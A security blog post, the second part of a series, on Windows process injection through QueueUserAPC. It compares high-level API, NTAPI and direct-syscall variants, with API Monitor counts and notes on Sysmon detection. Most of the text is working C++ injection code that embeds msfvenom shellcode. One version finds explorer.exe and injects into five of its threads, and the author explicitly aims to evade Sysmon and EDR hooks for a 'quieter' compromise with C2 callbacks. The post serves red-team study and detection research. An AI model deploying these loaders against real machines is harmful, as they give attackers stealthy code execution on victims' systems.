Process Injection Part 2 | QueueUserAPC()
Contents
In the first process injection post, we talked about CreateRemoteThread() which, is the vanilla method of process injection that most threat actors use considering its simplicity and reliability. Today we’re going to look at QueueUserAPC which takes advantage of the asynchronous procedure call to queue a specific thread. This API has several benefits in which the most appreciated is its ability to circumvent Sysmon.
This post will be broken down into four (4) parts:
- Process Injection Primer – Subject to the injection technique, we will review how this type of injection works programmatically.
- Analyze High Level Windows API Calls – Use the MSDN Documented methods and functions.
- API Call Analysis
- Sysmon events and logging
- Analyze Medium Level Windows Syscalls Using LoadLibrary – Use the NTAPI Undocumented functions via ntdll.dll
- API Call Analysis
- Sysmon events and logging
- Analyze Low Level Windows Syscalls Using x86 Assembly – Custom via Rolling Our Own Syscalls 🔥
- API Call Analysis
- Sysmon events and logging
In concerns with the Sysmon Analysis, I am using same Sysmon Config as part 1 with one slight adjustment. Considering QueueUserAPC() will bypass Sysmon detection, I have expanded the Processes Accessed (Event ID 10) parameters based off of ion-storm’s configuration. With this event, we can detail the specifics of the injection without actually seeing an event (correlational).
Before we go any deeper, let me define what I mean when I say High, Medium, and Low level API’s:
- High-Level API – This is the MSDN (proper/safe) method of execution. In other words, if you were a developer, and you needed to use these functions legitimately, you would use the MSDN documentation to accomplish your goal. These functions are High-Level because they are translated by the OS to Medium/Low level functions and instructions. This is done for several reasons the most important of which is ease of development.
- Medium-Level API – The OS maps High-Level API calls to Lower-Level API Calls (which in the context of this post we’re calling medium-level). For our purposes, a large majority of those calls live within ntdll.dll and kernel32.dll. We get the “Medium-Level” by cutting out the middle man (The OS) and calling the Low-Level API Calls ourselves. The reason I call it Medium is that we are still using dlls that live on the Windows OS and when we map and call functions from those dlls the OS, and other system monitoring software, can still see those calls.
- Low-Level API – The “Low-Level” is defined by rolling our own everything! We do not use ntdll.dll or kernel32.dll to accomplish our process injection (i.e., we do not map any functions). In this case, we have a custom x86 assembly file (custom.asm) and a corresponding header file (custom.h). These files map direct syscall functions in order to circumvent both the High and Medium level API’s (essentially). Regarding the process injection, we do not load external resources or rely on any OS translation, we do it ourselves.
All source code is written in C++ or x86 ASM. For continuity, I will be compiling all my builds for x64 bit architectures.
Reference Material
- MSDN Documentation for all High-Level API calls.
- NTAPI Undocumented Functions for all Low-Level API Calls.
- NtSuspendThread
- NtAllocateVirtualMemory
- NtWriteVirtualMemory
- NtQueueApcThread
- NtResumeThread
- Tools
- Sysmon: For the Sysmon Analysis portion, I am using SwiftOnSecurity’s Sysmon Configuration for basic analysis. This is a great Starter configuration that should be amended/changed to meet your organizations threat model/need. A good example as to what can be done with Swift’s stock configuration is one that ion-storm developed.
- API Monitor: We look use this tool to review the true API calls for all levels of API’s.
- Process Hacker: A great to for analyzing processes in general.
- Procmon: Similar to Process Hacker but with some more advanced features such as determining API calls from user to kernel land.
- SysWhispers: @Jackson_T’s python tool that generates x86 ASM that can be directly imported into your C++ Project.
Process Injection Primer
QueueUserAPC is an Asynchronous Procedure Call. Let’s break down what the means:
- Asynchronous – not simultaneous or concurrent in time.
- Procedure Call – The details of a specific, singular, procedure. In our example, it’s the shellcode that will execute notepad.exe.
This means a few things. First, since it’s asynchronous we need to be able to pause/suspend the thread that is going to execute our shellcode (i.e., we cannot have the thread running when we give it a procedure). Second, we need to open the thread (OpenThread()) and assign it a procedure. Last, we need to resume the thread to obtain code execution.
In the examples to follow, I generate a nslookup.exe process in the C++ code to which I then inject the shellcode into. However, an attacker may want to be more dynamic with their injection. There are really three ways to go about QueueUserAPC Injection:
- Start a suspended process (CreateProcess()), inject into it, resume threads.
- Have a predefined process name (such as explorer.exe) that we know is going to be running on system, enumerate processes for PID’s, enumerate the threads of the selected PID, suspend the threads, inject shellcode, resume threads.
- I have provided an example below within the Real World Example section.
- Have a list/array of predefined process names that the code will enumerate if said process is running, enumerate processes for PID’s, enumerate the threads of the selected PID, suspend the threads, inject shellcode, resume threads.
VirtualAllocEx() → WriteProcessMemory()
Just like CreateRemoteThread(), we allocate memory in the external processes’ memory space and write our shellcode to that newly allocated space.
SuspendThread()
NOTE: In the examples to come, I create a process in a Suspended state however, if you have selected an already running process you will have to manually enumerate the Threads associated with the process and suspend the threads you are going to inject into. I say this because you will not see the OpenProcess() or SuspendThread() API call in my code.
Once a process has been selected and you have the thread id’s, you can suspend all or a single thread with the SuspendThread() API call. In a debugger, I have generated a nslookup.exe process in a suspended state. We can look at the process in Process Hacker to verify that our thread is in-fact suspended.
QueueUserAPC() → ResumeThread()
We assign the procedure call (execute the shellcode) to the nslookup.exe suspended thread via QueueUserAPC() API. Next, we resume the thread to move the threads state from Wait:Suspended to Running. Once the thread starts, it will execute the procedure call (our shellcode) and terminate itself.
High Level API
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 |
#include <iostream> #include <Windows.h> int main() { // msfvenom -p windows/x64/exec CMD=notepad.exe -f c unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x6e\x6f\x74" "\x65\x70\x61\x64\x2e\x65\x78\x65\x00"; // Create a 64-bit process: STARTUPINFO si; PROCESS_INFORMATION pi; LPVOID allocation_start; SIZE_T allocation_size = sizeof(shellcode); LPCWSTR cmd; HANDLE hProcess, hThread; NTSTATUS status; ZeroMemory(&si, sizeof(si)); ZeroMemory(&pi, sizeof(pi)); si.cb = sizeof(si); cmd = TEXT("C:\\Windows\\System32\\nslookup.exe"); if (!CreateProcess( cmd, // Executable NULL, // Command line NULL, // Process handle not inheritable NULL, // Thread handle not inheritable FALSE, // Set handle inheritance to FALSE CREATE_SUSPENDED | // Create Suspended for APC Injection CREATE_NO_WINDOW, // Do Not Open a Window NULL, // Use parent's environment block NULL, // Use parent's starting directory &si, // Pointer to STARTUPINFO structure &pi // Pointer to PROCESS_INFORMATION structure (removed extra parentheses) )) { DWORD errval = GetLastError(); std::cout << "FAILED" << errval << std::endl; } WaitForSingleObject(pi.hProcess, 2000); // Allow nslookup 1 second to start/initialize. hProcess = pi.hProcess; hThread = pi.hThread; // Allocation Memory and Write shellcode to the allocated buffer allocation_start = VirtualAllocEx(hProcess, NULL, allocation_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); WriteProcessMemory(hProcess, allocation_start, shellcode, allocation_size, NULL); // Inject into the suspended thread. PTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)allocation_start; //hThread = OpenThread(THREAD_ALL_ACCESS, TRUE, pi.dwThreadId); // <-- Open a Thread if needed QueueUserAPC((PAPCFUNC)apcRoutine, hThread, NULL); // Resume the suspended thread ResumeThread(hThread); } |
API Call Analysis
To analyze API calls, I am using API Monitor with the following filters: [Data Access and Storage, NT Native, System Services].
Item | Count |
---|---|
Number of API Calls | 174 |
Total Amount of Memory Used | 116 KB |
We’ve mapped each API call during the High Level API execution flow. We can easily distinguish the High Level API to Low Level API functions that the OS translates during runtime (i.e., VirtualAllocEx → NtAllocateVirtualMemory) This is an important point of interest as it’s common practice for AV / EDR systems to hook these API calls prior to them being handed off to the Windows Kernel to execute a syscall. Our goal is to go lower and therefore avoid such hooks.
Sysmon Analysis
Sysmon is unable to detect process injection via QueueUserAPC(). This is, from my limited understanding, because we are not creating a new thread within the victim process. We are enumerating the threads the process has instantiated, opening the thread, suspending it, giving it a procedure call (our shellcode), and resuming the thread. We are simply accessing a process and telling it to execute some procedure which, is a bit less invasive.
Looking at the image above, we have keyed in on Sysmon Event ID 10: Process Accessed. During our injection, we do request access to a process via the OpenProcess() or NtOpenProcess(). My example does not open a process to access it since I have used CreateProcess() for demonstration purposes. However, We still can see that Sysmon has detected that the program PI_QUA_High_Level.exe has accessed C:\Windows\System32\nslookup.exe. The interesting part is that Sysmon records a full Call Trace for the event. This could possibly be used for heuristic detection.
Medium Level API
Let’s move a bit lower this time. As stated in the beginning of this post, the designation Medium Level API is simply my nomenclature which means we are avoiding the OS translation and are going to map/call the Nt* functions directly.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 |
#include <iostream> #include <Windows.h> typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, * PUNICODE_STRING; typedef struct _PS_ATTRIBUTE { ULONG Attribute; SIZE_T Size; union { ULONG Value; PVOID ValuePtr; } u1; PSIZE_T ReturnLength; } PS_ATTRIBUTE, * PPS_ATTRIBUTE; typedef struct _PS_ATTRIBUTE_LIST { SIZE_T TotalLength; PS_ATTRIBUTE Attributes[1]; } PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST; typedef struct _OBJECT_ATTRIBUTES { ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService; } OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; typedef struct _CLIENT_ID { void* UniqueProcess; void* UniqueThread; } CLIENT_ID, * PCLIENT_ID; typedef struct _IO_STATUS_BLOCK { union { NTSTATUS Status; VOID* Pointer; }; ULONG_PTR Information; } IO_STATUS_BLOCK, * PIO_STATUS_BLOCK; typedef VOID(NTAPI* PIO_APC_ROUTINE) ( IN PVOID ApcContext, IN PIO_STATUS_BLOCK IoStatusBlock, IN ULONG Reserved); typedef NTSTATUS(NTAPI* pNtOpenProcess)(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId); typedef NTSTATUS(NTAPI* pNtOpenThread)(PHANDLE ThreadHandle, ACCESS_MASK AccessMask, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID); typedef NTSTATUS(NTAPI* pNtSuspendThread)(HANDLE ThreadHandle, PULONG SuspendCount); typedef NTSTATUS(NTAPI* pNtAlertResumeThread)(HANDLE ThreadHandle, PULONG SuspendCount); typedef NTSTATUS(NTAPI* pNtAllocateVirtualMemory)(HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, PULONG RegionSize, ULONG AllocationType, ULONG Protect); typedef NTSTATUS(NTAPI* pNtWriteVirtualMemory)(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToWrite, PULONG NumberOfBytesWritten); typedef NTSTATUS(NTAPI* pNtQueueApcThread)(HANDLE ThreadHandle, PIO_APC_ROUTINE ApcRoutine, PVOID ApcRoutineContext OPTIONAL, PIO_STATUS_BLOCK ApcStatusBlock OPTIONAL, ULONG ApcReserved OPTIONAL); int main() { // msfvenom -p windows/x64/exec CMD=notepad.exe -f c unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x6e\x6f\x74" "\x65\x70\x61\x64\x2e\x65\x78\x65\x00"; // Create a 64-bit process: STARTUPINFO si; PROCESS_INFORMATION pi; LPVOID allocation_start; SIZE_T allocation_size = sizeof(shellcode); LPCWSTR cmd; HANDLE hProcess, hThread; NTSTATUS status; ZeroMemory(&si, sizeof(si)); ZeroMemory(&pi, sizeof(pi)); si.cb = sizeof(si); cmd = TEXT("C:\\Windows\\System32\\nslookup.exe"); if (!CreateProcess( cmd, // Executable NULL, // Command line NULL, // Process handle not inheritable NULL, // Thread handle not inheritable FALSE, // Set handle inheritance to FALSE CREATE_SUSPENDED | // Create Suspended for APC Injection CREATE_NO_WINDOW, // Do Not Open a Window NULL, // Use parent's environment block NULL, // Use parent's starting directory &si, // Pointer to STARTUPINFO structure &pi // Pointer to PROCESS_INFORMATION structure (removed extra parentheses) )) { DWORD errval = GetLastError(); std::cout << "FAILED" << errval << std::endl; } WaitForSingleObject(pi.hProcess, 1000); // Allow nslookup 1 second to start/initialize. hProcess = pi.hProcess; hThread = pi.hThread; // MEDIUM LEVEL API: // Stole Some Code From --> https://github.com/uvbs/NT-APC-Injector FARPROC fpAddresses[6] = { GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA"), GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtAllocateVirtualMemory"), GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtWriteVirtualMemory"), GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtSuspendThread"), GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtAlertResumeThread"), GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQueueApcThread") }; // setup for NTAPI functions pNtAllocateVirtualMemory fNtAllocateVirtualMemory = (pNtAllocateVirtualMemory)fpAddresses[1]; pNtWriteVirtualMemory fNtWriteVirtualMemory = (pNtWriteVirtualMemory)fpAddresses[2]; pNtSuspendThread fNtSuspendThread = (pNtSuspendThread)fpAddresses[3]; pNtAlertResumeThread fNtAlertResumeThread = (pNtAlertResumeThread)fpAddresses[4]; pNtQueueApcThread fNtQueueApcThread = (pNtQueueApcThread)fpAddresses[5]; allocation_start = nullptr; fNtAllocateVirtualMemory(pi.hProcess, &allocation_start, 0, (PULONG)&allocation_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); fNtWriteVirtualMemory(pi.hProcess, allocation_start, shellcode, sizeof(shellcode), 0); fNtQueueApcThread(hThread, (PIO_APC_ROUTINE)allocation_start, allocation_start, NULL, NULL); fNtAlertResumeThread(hThread, NULL); } |
API Call Analysis
To analyze API calls, I am using API Monitor with the following filters: [Data Access and Storage, NT Native, System Services].
Item | Count |
---|---|
Number of API Calls | 199 |
Total Amount of Memory Used | 127 KB |
The total number of API calls was 199 which is much larger than the High Level API’s 174 Calls. That’s pretty noisy but, not unexpected considering the total number of functions that we needed to map from ntdll.dll and kernel32.dll. This does create a lot of overall events that are not necessary if we were to map the functions within a custom implementation which, is what we are going to do within the Low Level API.
One thing that I would find very interesting is to analyze valid implementations for QueueUserAPC and determine if the sample above can easily be defined malicious subject to Call activity alone.
Overall, though, we did decrease the High Level API calls regarding the injection itself which, is a step in the right direction.
Sysmon Analysis
As expected, any indication of process injection has not been defined by Sysmon. Similar to the High Level code, we were able to distinguish which processes were accessed with details containing the Call Trace. Again, this could be very helpful to a RE or triage analyst who is responding to a possible compromise.
Low Level API
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 |
#include <iostream> #include <Windows.h> #include "common.h" int main() { // msfvenom -p windows/x64/exec CMD=notepad.exe -f c unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x6e\x6f\x74" "\x65\x70\x61\x64\x2e\x65\x78\x65\x00"; // Create a 64-bit process: STARTUPINFO si; PROCESS_INFORMATION pi; LPVOID allocation_start; SIZE_T allocation_size = sizeof(shellcode); LPCWSTR cmd; HANDLE hProcess, hThread; NTSTATUS status; ZeroMemory(&si, sizeof(si)); ZeroMemory(&pi, sizeof(pi)); si.cb = sizeof(si); cmd = TEXT("C:\\Windows\\System32\\nslookup.exe"); if (!CreateProcess( cmd, // Executable NULL, // Command line NULL, // Process handle not inheritable NULL, // Thread handle not inheritable FALSE, // Set handle inheritance to FALSE CREATE_SUSPENDED | // Create Suspended for APC Injection CREATE_NO_WINDOW, // Do Not Open a Window NULL, // Use parent's environment block NULL, // Use parent's starting directory &si, // Pointer to STARTUPINFO structure &pi // Pointer to PROCESS_INFORMATION structure (removed extra parentheses) )) { DWORD errval = GetLastError(); std::cout << "FAILED" << errval << std::endl; } WaitForSingleObject(pi.hProcess, 1000); // Allow nslookup 1 second to start/initialize. hProcess = pi.hProcess; hThread = pi.hThread; // LOW LEVEL API: allocation_start = nullptr; NtAllocateVirtualMemory(pi.hProcess, &allocation_start, 0, (PULONG)&allocation_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); NtWriteVirtualMemory(pi.hProcess, allocation_start, shellcode, sizeof(shellcode), 0); NtQueueApcThread(hThread, (PKNORMAL_ROUTINE)allocation_start, allocation_start, NULL, NULL); NtResumeThread(hThread, NULL); } |
API Call Analysis
To analyze API calls, I am using API Monitor with the following filters: [Data Access and Storage, NT Native, System Services].
Item | Count |
---|---|
Total Number of Calls | 165 |
Total Amount of Memory Used | 112 KB |
We have an overall very low number of calls which, makes us much quieter. To top it off, we also only see the WaitForSingleObject() call which is called right after we execute CreateProcess() in order to let nslookup.exe initialize. We do not see any of our process injection calls within API Monitor. It goes to reason then that AV / EDR systems would have a very difficult time hooking not only direct syscalls but, a process injection technique that is undetectable by Sysmon (That does not mean other systems can’t detect it, they can.).
Sysmon Analysis
The Sysmon output is symmetrical to the High and Medium level analysis. Honestly, I just put the image here for continuity’ sake.
Real World Scenario
Let’s take a second and look at a real world example using this process injection technique. The reason for this section is to analyze the reliability of QueueUserAPC() injection and detail ways to make it more consistent. This code sample below is using the SysWhispers Direct Syscall Methodology just like the Low Level API example above. You will notice several differences within this source however. The first being we are not creating a process, we are in-fact looking for explorer.exe, obtaining a handle to the process, enumerating the processes threads, and injecting into five (5) of those threads.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 |
#include <iostream> #include <Windows.h> #include <TlHelp32.h> #include <vector> #include "common.h" int main() { // msfvenom -p windows/x64/exec CMD=notepad.exe -f c unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x6e\x6f\x74" "\x65\x70\x61\x64\x2e\x65\x78\x65\x00"; /* Objects to enumerate an external Process: */ HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS | TH32CS_SNAPTHREAD, 0); PROCESSENTRY32 processEntry = { sizeof(PROCESSENTRY32) }; DWORD dwProcessId; /* Objects for Process Injection: */ LPVOID allocation_start; SIZE_T allocation_size = sizeof(shellcode); HANDLE hThread; HANDLE hProcess; /* Find an explorer.exe process and save PID: */ if (Process32First(snapshot, &processEntry)) { while (_wcsicmp(processEntry.szExeFile, L"explorer.exe") != 0) { Process32Next(snapshot, &processEntry); } } dwProcessId = processEntry.th32ProcessID; std::cout << "Process ID: " << dwProcessId << std::endl; /* Open the Process, allocate memory, write shellcode */ OBJECT_ATTRIBUTES pObjectAttributes; InitializeObjectAttributes(&pObjectAttributes, NULL, NULL, NULL, NULL); CLIENT_ID pClientId; pClientId.UniqueProcess = (PVOID)processEntry.th32ProcessID; pClientId.UniqueThread = (PVOID)0; allocation_start = nullptr; NtOpenProcess(&hProcess, MAXIMUM_ALLOWED, &pObjectAttributes, &pClientId); NtAllocateVirtualMemory(hProcess, &allocation_start, 0, (PULONG)&allocation_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); NtWriteVirtualMemory(hProcess, allocation_start, shellcode, sizeof(shellcode), 0); /* Enumerate all the threads assocaited with explorer.exe and save to vector */ THREADENTRY32 threadEntry = { sizeof(THREADENTRY32) }; std::vector<DWORD> threadIds; if (Thread32First(snapshot, &threadEntry)) { do { if (threadEntry.th32OwnerProcessID == processEntry.th32ProcessID) { threadIds.push_back(threadEntry.th32ThreadID); } } while (Thread32Next(snapshot, &threadEntry)); } std::cout << "Total Threads Found: " << threadIds.size() << std::endl; /* For each thread assocated with Explorer.exe, open the thread and assign it * the APC to execute our shellcode: */ int count = 0; for (DWORD threadId : threadIds) { std::cout << "Injecting into Thread: " << threadId << std::endl; OBJECT_ATTRIBUTES tObjectAttributes; InitializeObjectAttributes(&tObjectAttributes, NULL, NULL, NULL, NULL); CLIENT_ID tClientId; tClientId.UniqueProcess = (PVOID)dwProcessId; tClientId.UniqueThread = (PVOID)threadId; NtOpenThread(&hThread, MAXIMUM_ALLOWED, &tObjectAttributes, &tClientId); NtSuspendThread(hThread, NULL); NtQueueApcThread(hThread, (PKNORMAL_ROUTINE)allocation_start, allocation_start, NULL, NULL); NtResumeThread(hThread, NULL); count++; // Limit Injection to 5 threads. if (count == 5) { break; } } } |
When utilizing this form of process injection, it’s necessary to inject into 3-5 threads for reliability. That’s the first reason we hard code a five (5) thread injection limit. The second reason being, we don’t want to get 20-50 threads to execute our shellcode and obtain 20-50 remote callbacks to our C2. That’s just way too loud! For example, we are injecting into explorer.exe which is always going to be running. At any time, that process is going to have 20-50 threads running so, we limit our impact by only using 5.
The thread limit could actually be avoided via a check for C2 traffic and a Mutex but, I’m not going to detail that here.
Once we execute the binary, we can see that the program found 35 threads associated with explorer.exe, and we injected into five (5) of those threads. We only received three (3) notepad.exe instances meaning that of the five (5) threads, only three (3) of those threads successfully executed our shellcode. In my experience, only 60%-70% of the injected threads successfully execute and it’s extremely variable with limited consistency.
The other issue I see often is that we crash the application we inject into. This is the case with several forms of process injection but with QueueUserAPC(), there is a very high probability of crashing explorer.exe considering the example above. And as a matter of a fact, we do crash explorer.exe during our injection.
This example shows the variability and overall success probability that should be taken into account each time you use this technique. We don’t want to crash systems, and we don’t want to impact employees day-to-day operations so, choose the process carefully and limit the overall exposure.
Conclusion
The ability execute our shellcode using direct syscalls rather than using Windows dependencies (Documented API, ntdll.dll, kernerl32.dll) allows for a much quieter and streamlined compromise. However, we were also able to circumvent common process injection detection via Sysmon by using QueueUserAPC() instead of CreateRemoteThread(). The image below details the QueueUserAPC Process Injection API calls that were observed via API Monitor.

QueueUserAPC() Vs. CreateRemoteThread()
Injection Type | API Level | Total API Calls | Total Memory Used |
---|---|---|---|
CreateRemoteThread() | High | 298 | 192 KB |
CreateRemoteThread() | Medium | 309 | 196 KB |
CreateRemoteThread() | Low | 288 | 186 KB |
QueueUserAPC() | High | 174 | 116 KB |
